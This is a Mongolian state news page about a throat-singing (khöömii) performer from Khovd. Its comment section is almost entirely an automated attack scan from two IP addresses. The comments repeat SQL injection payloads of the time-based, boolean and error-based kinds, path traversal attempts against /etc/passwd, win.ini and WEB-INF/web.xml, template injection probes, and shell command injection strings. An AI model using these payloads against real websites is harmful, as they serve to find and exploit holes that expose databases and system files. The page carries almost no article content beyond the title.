ХОВД: Д.Цэрэндаваа: Хөөмийн урлагийг түгээн дэлгэрүүлэх чин хүсэлтэй

ВИДЕО МЭДЭЭ
montastudio@montsame.gov.mn
2022-12-14 13:19:48
Холбоотой мэдээ
Сэтгэгдлүүд
 • admin 185.234.72.114 100 өдөр

  123456'/**/and/**/DBMS_PIPE.RECEIVE_MESSAGE('q',7)='q
 • admin 185.234.72.114 100 өдөр

  123456'/**/and/**/DBMS_PIPE.RECEIVE_MESSAGE('l',0)='l
 • admin 185.234.72.114 100 өдөр

  123456/**/and/**/1=DBMS_PIPE.RECEIVE_MESSAGE('i',7)
 • admin 185.234.72.114 100 өдөр

  123456/**/and/**/1=DBMS_PIPE.RECEIVE_MESSAGE('g',0)
 • admin 185.234.72.114 100 өдөр

  123456'and(select+1)>0waitfor/**/delay'0:0:7
 • admin 185.234.72.114 100 өдөр

  123456'and(select+1)>0waitfor/**/delay'0:0:0
 • admin 185.234.72.114 100 өдөр

  123456/**/and(select+1)>0waitfor/**/delay'0:0:7'/**/
 • admin 185.234.72.114 100 өдөр

  123456/**/and(select+1)>0waitfor/**/delay'0:0:0'/**/
 • admin 185.234.72.114 100 өдөр

  123456'/**/and(select'1'from/**/pg_sleep(7))::text>'0
 • admin 185.234.72.114 100 өдөр

  123456'/**/and(select'1'from/**/pg_sleep(0))::text>'0
 • ../../../../WEB-INF/web.xml;admin 185.234.72.114 100 өдөр

  123456
 • admin 185.234.72.114 100 өдөр

  123456/**/and(select+1/**/from/**/pg_sleep(7))>0/**/
 • ../../../../WEB-INF/web.xml 185.234.72.114 100 өдөр

  123456
 • admin 185.234.72.114 100 өдөр

  123456/**/and(select+1/**/from/**/pg_sleep(0))>0/**/
 • ../../../WEB-INF/web.xml;admin 185.234.72.114 100 өдөр

  123456
 • admin 185.234.72.114 100 өдөр

  123456"and(select*from(select+sleep(7))a/**/union/**/select+1)="
 • ../../../WEB-INF/web.xml 185.234.72.114 100 өдөр

  123456
 • admin 185.234.72.114 100 өдөр

  123456"and(select*from(select+sleep(0))a/**/union/**/select+1)="
 • ../../WEB-INF/web.xml;admin 185.234.72.114 100 өдөр

  123456
 • admin 185.234.72.114 100 өдөр

  123456'and(select*from(select+sleep(7))a/**/union/**/select+1)='
 • ../../WEB-INF/web.xml 185.234.72.114 100 өдөр

  123456
 • admin 185.234.72.114 100 өдөр

  123456'and(select*from(select+sleep(0))a/**/union/**/select+1)='
 • ../WEB-INF/web.xml;admin 185.234.72.114 100 өдөр

  123456
 • admin 185.234.72.114 100 өдөр

  (select*from(select+sleep(7)union/**/select+1)a)
 • ../WEB-INF/web.xml 185.234.72.114 100 өдөр

  123456
 • admin 185.234.72.114 100 өдөр

  (select*from(select+sleep(0)union/**/select+1)a)
 • admin 185.234.72.114 100 өдөр

  123456"and"a"="u
 • WEB-INF/web.xml;admin 185.234.72.114 100 өдөр

  123456
 • WEB-INF/web.xml 185.234.72.114 100 өдөр

  123456
 • admin 185.234.72.114 100 өдөр

  123456"and"z"="z
 • %u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215Windows%u2215win%u002eini 185.234.72.114 100 өдөр

  123456
 • admin 185.234.72.114 100 өдөр

  123456'and'y'='z
 • admin 185.234.72.114 100 өдөр

  123456'and'g'='g
 • admin 185.234.72.114 100 өдөр

  123456/**/and+4=7
 • %2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fWindows%2fwin%2eini 185.234.72.114 100 өдөр

  123456
 • ../../../../../../Windows/win.iniadmin 185.234.72.114 100 өдөр

  123456
 • admin 185.234.72.114 100 өдөр

  123456/**/and+3=3
 • ./../../../../../../Windows/win.ini 185.234.72.114 100 өдөр

  123456
 • ../../../../../../Windows/win.ini 185.234.72.114 100 өдөр

  123456
 • admin'"\( 185.234.72.114 100 өдөр

  123456
 • admin鎈'"\( 185.234.72.114 100 өдөр

  123456
 • admin'and/**/convert(int,sys.fn_sqlvarbasetostr(HashBytes('MD5','1134675806')))>'0 185.234.72.114 100 өдөр

  123456
 • convert(int,sys.fn_sqlvarbasetostr(HashBytes('MD5','1420746058'))) 185.234.72.114 100 өдөр

  123456
 • ../../../../../../../../../../../../../../../../../../Windows/win.iniadmin 185.234.72.114 100 өдөр

  123456
 • admin/**/and/**/cast(md5('1529427405')as/**/int)>0 185.234.72.114 100 өдөр

  123456
 • admin'and(select'1'from/**/cast(md5(1360482353)as/**/int))>'0 185.234.72.114 100 өдөр

  123456
 • ./../../../../../../../../../../../../../../../../../../Windows/win.ini 185.234.72.114 100 өдөр

  123456
 • ../../../../../../../../../../../../../../../../../../Windows/win.ini 185.234.72.114 100 өдөр

  123456
 • extractvalue(1,concat(char(126),md5(1137633978))) 185.234.72.114 100 өдөр

  123456
 • %u002e%u002e%u2216%u002e%u002e%u2216%u002e%u002e%u2216%u002e%u002e%u2216%u002e%u002e%u2216%u002e%u002e%u2216Windows%u2216win%u002eini 185.234.72.114 100 өдөр

  123456
 • admin"and/**/extractvalue(1,concat(char(126),md5(1574197097)))and" 185.234.72.114 100 өдөр

  123456
 • %2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cWindows%5cwin%2eini 185.234.72.114 100 өдөр

  123456
 • admin'and/**/extractvalue(1,concat(char(126),md5(1843213606)))and' 185.234.72.114 100 өдөр

  123456
 • ..\..\..\..\..\..\Windows\win.iniadmin 185.234.72.114 100 өдөр

  123456
 • admin 185.234.72.114 100 өдөр

  123456'"\(
 • admin 185.234.72.114 100 өдөр

  123456鎈'"\(
 • .\..\..\..\..\..\..\Windows\win.ini 185.234.72.114 100 өдөр

  123456
 • admin 185.234.72.114 100 өдөр

  123456'and/**/convert(int,sys.fn_sqlvarbasetostr(HashBytes('MD5','1088178724')))>'0
 • ..\..\..\..\..\..\Windows\win.ini 185.234.72.114 100 өдөр

  123456
 • admin 185.234.72.114 100 өдөр

  convert(int,sys.fn_sqlvarbasetostr(HashBytes('MD5','1189057177')))
 • <%- 881837270+924669770 %> 185.234.72.114 100 өдөр

  123456
 • admin 185.234.72.114 100 өдөр

  123456/**/and/**/cast(md5('1800093593')as/**/int)>0
 • admin 185.234.72.114 100 өдөр

  123456'and(select'1'from/**/cast(md5(1139778533)as/**/int))>'0
 • admin 185.234.72.114 100 өдөр

  extractvalue(1,concat(char(126),md5(1870749143)))
 • #set($c=903859181+814251063)${c}$c 185.234.72.114 100 өдөр

  123456
 • admin'/**/and/**/DBMS_PIPE.RECEIVE_MESSAGE('h',7)='h 185.234.72.114 100 өдөр

  123456
 • admin 185.234.72.114 100 өдөр

  123456"and/**/extractvalue(1,concat(char(126),md5(1863559184)))and"
 • admin'/**/and/**/DBMS_PIPE.RECEIVE_MESSAGE('d',0)='d 185.234.72.114 100 өдөр

  123456
 • admin 185.234.72.114 100 өдөр

  123456'and/**/extractvalue(1,concat(char(126),md5(1916493173)))and'
 • ${(971969003+839283348)?c} 185.234.72.114 100 өдөр

  123456
 • admin'and(select+1)>0waitfor/**/delay'0:0:7 185.234.72.114 100 өдөр

  123456
 • ${933635018+859758893} 185.234.72.114 100 өдөр

  123456
 • /*1*/{{952530916+950988265}} 185.234.72.114 100 өдөр

  123456
 • admin'and(select+1)>0waitfor/**/delay'0:0:0 185.234.72.114 100 өдөр

  123456
 • admin 185.234.72.114 100 өдөр

  <%- 914540777+921085627 %>
 • ..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\Windows\win.iniadmin 185.234.72.114 100 өдөр

  123456
 • admin 185.234.72.114 100 өдөр

  #set($c=952336325+876469712)${c}$c
 • admin'/**/and(select'1'from/**/pg_sleep(7))::text>'0 185.234.72.114 100 өдөр

  123456
 • .\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\Windows\win.ini 185.234.72.114 100 өдөр

  123456
 • admin'/**/and(select'1'from/**/pg_sleep(0))::text>'0 185.234.72.114 100 өдөр

  123456
 • ..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\Windows\win.ini 185.234.72.114 100 өдөр

  123456
 • admin 185.234.72.114 100 өдөр

  ${(944786268+952349775)?c}
 • %u2215etc%u2215passwd 185.234.72.114 100 өдөр

  123456
 • admin"and(select*from(select+sleep(7))a/**/union/**/select+1)=" 185.234.72.114 100 өдөр

  123456
 • admin 185.234.72.114 100 өдөр

  ${847021738+941064452}
 • %2fetc%2fpasswd 185.234.72.114 100 өдөр

  123456
 • expr 863231086 + 884717288 185.234.72.114 100 өдөр

  123456
 • admin"and(select*from(select+sleep(0))a/**/union/**/select+1)=" 185.234.72.114 100 өдөр

  123456
 • /etc/passwdadmin 185.234.72.114 100 өдөр

  123456
 • admin 185.234.72.114 100 өдөр

  /*1*/{{809466676+919207246}}
 • admin'and(select*from(select+sleep(7))a/**/union/**/select+1)=' 185.234.72.114 100 өдөр

  123456
 • admin&set /A 830597787+987742527 185.234.72.114 100 өдөр

  123456
 • /etc/passwd 185.234.72.114 100 өдөр

  123456
 • admin$(expr 859324456 + 892335029) 185.234.72.114 100 өдөр

  123456
 • %u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215etc%u2215passwd 185.234.72.114 100 өдөр

  123456
 • admin'and(select*from(select+sleep(0))a/**/union/**/select+1)=' 185.234.72.114 100 өдөр

  123456
 • admin|expr 857546360 + 990423375 185.234.72.114 100 өдөр

  123456
 • %2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fpasswd 185.234.72.114 100 өдөр

  123456
 • admin 185.234.72.114 100 өдөр

  123456
 • admin 185.234.72.114 100 өдөр

  123456
 • ./../../../../../../etc/passwd 185.234.72.114 100 өдөр

  123456
 • admin 185.234.72.114 100 өдөр

  123456
 • ../../../../../../etc/passwdadmin 185.234.72.114 100 өдөр

  123456
 • '-var_dump(md5(587784896))-' 185.234.72.114 100 өдөр

  123456
 • admin expr 963227371 + 839628771 185.234.72.114 100 өдөр

  123456
 • admin"and"w"="t 185.234.72.114 100 өдөр

  123456
 • admin"and"y"="y 185.234.72.114 100 өдөр

  123456
 • ../../../../../../etc/passwd 185.234.72.114 100 өдөр

  123456
 • ${@var_dump(md5(463332195))}; 185.234.72.114 100 өдөр

  123456
 • admin 185.234.72.114 100 өдөр

  expr 844673270 + 928129406
 • admin'and't'='c 185.234.72.114 100 өдөр

  123456
 • admin 185.234.72.114 100 өдөр

  123456&set /A 897302713+989064485
 • admin 185.234.72.114 100 өдөр

  123456$(expr 991735877 + 926873895)
 • admin 185.234.72.114 100 өдөр

  '-var_dump(md5(368915547))-'
 • admin 185.234.72.114 100 өдөр

  123456|expr 814409622 + 823818205
 • admin'and'n'='n 185.234.72.114 100 өдөр

  123456
 • admin 185.234.72.114 100 өдөр

  ${813459176+811126924}
 • admin 185.234.72.114 100 өдөр

  ${@var_dump(md5(768626839))};
 • admin 185.234.72.114 100 өдөр

  jtqnwhclvkwcxicskzkh
 • admin 185.234.72.114 100 өдөр

  123456
 • admin 185.234.72.114 100 өдөр

  123456 expr 890609164 + 827176590
 • admin 185.234.72.114 100 өдөр

  123456
 • ./../../../../../../../../../../../../../../../../../../etc/passwd 185.234.72.114 100 өдөр

  123456
 • admin 185.234.72.114 100 өдөр

  123456
 • admin 185.234.72.114 100 өдөр

  123456
 • ../../../../../../../../../../../../../../../../../../etc/passwdadmin 185.234.72.114 100 өдөр

  123456
 • ${940535573+955016557} 185.234.72.114 100 өдөр

  123456
 • admin 185.234.72.114 100 өдөр

  123456
 • admin 185.234.72.114 100 өдөр

  123456
 • ../../../../../../../../../../../../../../../../../../etc/passwd 185.234.72.114 100 өдөр

  123456
 • jtqnwhclvkwcxicskzkh 185.234.72.114 100 өдөр

  123456
 • admin 185.234.72.114 100 өдөр

  123456
 • admin 194.163.191.42 101 өдөр

  123456'/**/and/**/DBMS_PIPE.RECEIVE_MESSAGE('r',14)='r
 • admin 194.163.191.42 101 өдөр

  123456'/**/and/**/DBMS_PIPE.RECEIVE_MESSAGE('p',0)='p
 • admin 194.163.191.42 101 өдөр

  123456/**/and/**/3=DBMS_PIPE.RECEIVE_MESSAGE('m',14)
 • admin 194.163.191.42 101 өдөр

  123456/**/and/**/1=DBMS_PIPE.RECEIVE_MESSAGE('q',0)
 • admin 194.163.191.42 101 өдөр

  123456'and(select+1)>0waitfor/**/delay'0:0:14
 • admin 194.163.191.42 101 өдөр

  123456'and(select+1)>0waitfor/**/delay'0:0:0
 • admin 194.163.191.42 101 өдөр

  123456/**/and(select+1)>0waitfor/**/delay'0:0:14'/**/
 • admin 194.163.191.42 101 өдөр

  123456/**/and(select+1)>0waitfor/**/delay'0:0:0'/**/
 • admin 194.163.191.42 101 өдөр

  123456'/**/and(select'1'from/**/pg_sleep(14))::text>'0
 • admin 194.163.191.42 101 өдөр

  123456'/**/and(select'1'from/**/pg_sleep(0))::text>'0
 • admin 194.163.191.42 101 өдөр

  123456/**/and(select+1/**/from/**/pg_sleep(14))>0/**/
 • admin 194.163.191.42 101 өдөр

  123456/**/and(select+1/**/from/**/pg_sleep(0))>0/**/
 • admin 194.163.191.42 101 өдөр

  123456"and(select*from(select+sleep(14))a/**/union/**/select+1)="
 • admin 194.163.191.42 101 өдөр

  123456"and(select*from(select+sleep(0))a/**/union/**/select+1)="
 • admin 194.163.191.42 101 өдөр

  123456'and(select*from(select+sleep(14))a/**/union/**/select+1)='
 • admin 194.163.191.42 101 өдөр

  123456'and(select*from(select+sleep(0))a/**/union/**/select+1)='
 • admin 194.163.191.42 101 өдөр

  (select*from(select+sleep(14)union/**/select+1)a)
 • admin 194.163.191.42 101 өдөр

  (select*from(select+sleep(0)union/**/select+1)a)
 • admin 194.163.191.42 101 өдөр

  123456"and"q"="i
 • ../../../../WEB-INF/web.xml;admin 194.163.191.42 101 өдөр

  123456
 • admin 194.163.191.42 101 өдөр

  123456"and"b"="b
 • ../../../../WEB-INF/web.xml 194.163.191.42 101 өдөр

  123456
 • ../../../WEB-INF/web.xml;admin 194.163.191.42 101 өдөр

  123456
 • admin 194.163.191.42 101 өдөр

  123456'and's'='r
 • ../../../WEB-INF/web.xml 194.163.191.42 101 өдөр

  123456
 • admin 194.163.191.42 101 өдөр

  123456'and'k'='k
 • ../../WEB-INF/web.xml;admin 194.163.191.42 101 өдөр

  123456
 • admin 194.163.191.42 101 өдөр

  123456/**/and+0=6
 • admin 194.163.191.42 101 өдөр

  123456/**/and+0=0
 • ../../WEB-INF/web.xml 194.163.191.42 101 өдөр

  123456
 • ../WEB-INF/web.xml;admin 194.163.191.42 101 өдөр

  123456
 • ../WEB-INF/web.xml 194.163.191.42 101 өдөр

  123456
 • WEB-INF/web.xml;admin 194.163.191.42 101 өдөр

  123456
 • WEB-INF/web.xml 194.163.191.42 101 өдөр

  123456
 • %u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215Windows%u2215win%u002eini 194.163.191.42 101 өдөр

  123456
 • %2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fWindows%2fwin%2eini 194.163.191.42 101 өдөр

  123456
 • ../../../../../../Windows/win.iniadmin 194.163.191.42 101 өдөр

  123456
 • ./../../../../../../Windows/win.ini 194.163.191.42 101 өдөр

  123456
 • ../../../../../../Windows/win.ini 194.163.191.42 101 өдөр

  123456
 • ../../../../../../../../../../../../../../../../../../Windows/win.iniadmin 194.163.191.42 101 өдөр

  123456
 • ./../../../../../../../../../../../../../../../../../../Windows/win.ini 194.163.191.42 101 өдөр

  123456
 • ../../../../../../../../../../../../../../../../../../Windows/win.ini 194.163.191.42 101 өдөр

  123456
 • %u002e%u002e%u2216%u002e%u002e%u2216%u002e%u002e%u2216%u002e%u002e%u2216%u002e%u002e%u2216%u002e%u002e%u2216Windows%u2216win%u002eini 194.163.191.42 101 өдөр

  123456
 • %2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cWindows%5cwin%2eini 194.163.191.42 101 өдөр

  123456
 • ..\..\..\..\..\..\Windows\win.iniadmin 194.163.191.42 101 өдөр

  123456
 • .\..\..\..\..\..\..\Windows\win.ini 194.163.191.42 101 өдөр

  123456
 • admin'/**/and/**/DBMS_PIPE.RECEIVE_MESSAGE('y',14)='y 194.163.191.42 101 өдөр

  123456
 • ..\..\..\..\..\..\Windows\win.ini 194.163.191.42 101 өдөр

  123456
 • admin'/**/and/**/DBMS_PIPE.RECEIVE_MESSAGE('g',0)='g 194.163.191.42 101 өдөр

  123456
 • admin'and(select+1)>0waitfor/**/delay'0:0:14 194.163.191.42 101 өдөр

  123456
 • admin'and(select+1)>0waitfor/**/delay'0:0:0 194.163.191.42 101 өдөр

  123456
 • admin'/**/and(select'1'from/**/pg_sleep(14))::text>'0 194.163.191.42 101 өдөр

  123456
 • admin'/**/and(select'1'from/**/pg_sleep(0))::text>'0 194.163.191.42 101 өдөр

  123456
 • ..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\Windows\win.iniadmin 194.163.191.42 101 өдөр

  123456
 • .\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\Windows\win.ini 194.163.191.42 101 өдөр

  123456
 • ..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\Windows\win.ini 194.163.191.42 101 өдөр

  123456
 • admin"and(select*from(select+sleep(14))a/**/union/**/select+1)=" 194.163.191.42 101 өдөр

  123456
 • %u2215etc%u2215passwd 194.163.191.42 101 өдөр

  123456
 • admin"and(select*from(select+sleep(0))a/**/union/**/select+1)=" 194.163.191.42 101 өдөр

  123456
 • %2fetc%2fpasswd 194.163.191.42 101 өдөр

  123456
 • admin'and(select*from(select+sleep(14))a/**/union/**/select+1)=' 194.163.191.42 101 өдөр

  123456
 • <%- 823264070+948506702 %> 194.163.191.42 101 өдөр

  123456
 • #set($c=836171532+824530038)${c}$c 194.163.191.42 101 өдөр

  123456
 • admin 194.163.191.42 101 өдөр

  expr 843210548 + 942332808
 • /etc/passwdadmin 194.163.191.42 101 өдөр

  123456
 • admin 194.163.191.42 101 өдөр

  123456&set /A 860600261+980342398
 • /etc/passwd 194.163.191.42 101 өдөр

  123456
 • ${(970865013+877681389)?c} 194.163.191.42 101 өдөр

  123456
 • admin'and(select*from(select+sleep(0))a/**/union/**/select+1)=' 194.163.191.42 101 өдөр

  123456
 • %u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215etc%u2215passwd 194.163.191.42 101 өдөр

  123456
 • admin 194.163.191.42 101 өдөр

  123456$(expr 997415868 + 948955069)
 • ${944820393+992584738} 194.163.191.42 101 өдөр

  123456
 • %2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fpasswd 194.163.191.42 101 өдөр

  123456
 • admin 194.163.191.42 101 өдөр

  123456|expr 895932799 + 910541547
 • /*1*/{{811104306+830720170}} 194.163.191.42 101 өдөр

  123456
 • admin 194.163.191.42 101 өдөр

  123456 expr 924435814 + 919411206
 • ./../../../../../../etc/passwd 194.163.191.42 101 өдөр

  123456
 • admin 194.163.191.42 101 өдөр

  123456
 • admin 194.163.191.42 101 өдөр

  123456
 • admin 194.163.191.42 101 өдөр

  123456
 • ../../../../../../etc/passwdadmin 194.163.191.42 101 өдөр

  123456
 • ../../../../../../etc/passwd 194.163.191.42 101 өдөр

  123456
 • admin 194.163.191.42 101 өдөр

  <%- 909082507+809759028 %>
 • admin"and"z"="i 194.163.191.42 101 өдөр

  123456
 • admin"and"c"="c 194.163.191.42 101 өдөр

  123456
 • admin'and'h'='d 194.163.191.42 101 өдөр

  123456
 • admin 194.163.191.42 101 өдөр

  #set($c=947462264+820025718)${c}$c
 • admin 194.163.191.42 101 өдөр

  123456
 • expr 926851524 + 848928052 194.163.191.42 101 өдөр

  123456
 • admin'and'm'='m 194.163.191.42 101 өдөр

  123456
 • admin 194.163.191.42 101 өдөр

  ${(831488431+954505483)?c}
 • admin 194.163.191.42 101 өдөр

  '-var_dump(md5(880641434))-'
 • admin 194.163.191.42 101 өдөр

  ${902841014+989822182}
 • admin 194.163.191.42 101 өдөр

  123456
 • admin&set /A 845172853+878858277 194.163.191.42 101 өдөр

  123456
 • admin 194.163.191.42 101 өдөр

  ${@var_dump(md5(652898198))};
 • ./../../../../../../../../../../../../../../../../../../etc/passwd 194.163.191.42 101 өдөр

  123456
 • axdtqjpmjwyspryfntta 194.163.191.42 101 өдөр

  123456
 • admin 194.163.191.42 101 өдөр

  axdtqjpmjwyspryfntta
 • admin 194.163.191.42 101 өдөр

  ${965873715+809575167}
 • ../../../../../../../../../../../../../../../../../../etc/passwdadmin 194.163.191.42 101 өдөр

  123456
 • admin$(expr 944199202 + 870445673) 194.163.191.42 101 өдөр

  123456
 • admin 194.163.191.42 101 өдөр

  /*1*/{{968050907+937422651}}
 • ${997858863+877640882} 194.163.191.42 101 өдөр

  123456
 • admin|expr 969019238 + 839192572 194.163.191.42 101 өдөр

  123456
 • '-var_dump(md5(504065660))-' 194.163.191.42 101 өдөр

  123456
 • ../../../../../../../../../../../../../../../../../../etc/passwd 194.163.191.42 101 өдөр

  123456
 • admin expr 924328232 + 890157102 194.163.191.42 101 өдөр

  123456
 • admin 194.163.191.42 101 өдөр

  123456
 • ${@var_dump(md5(447106007))}; 194.163.191.42 101 өдөр

  123456
 • admin 194.163.191.42 101 өдөр

  123456
 • admin 194.163.191.42 101 өдөр

  123456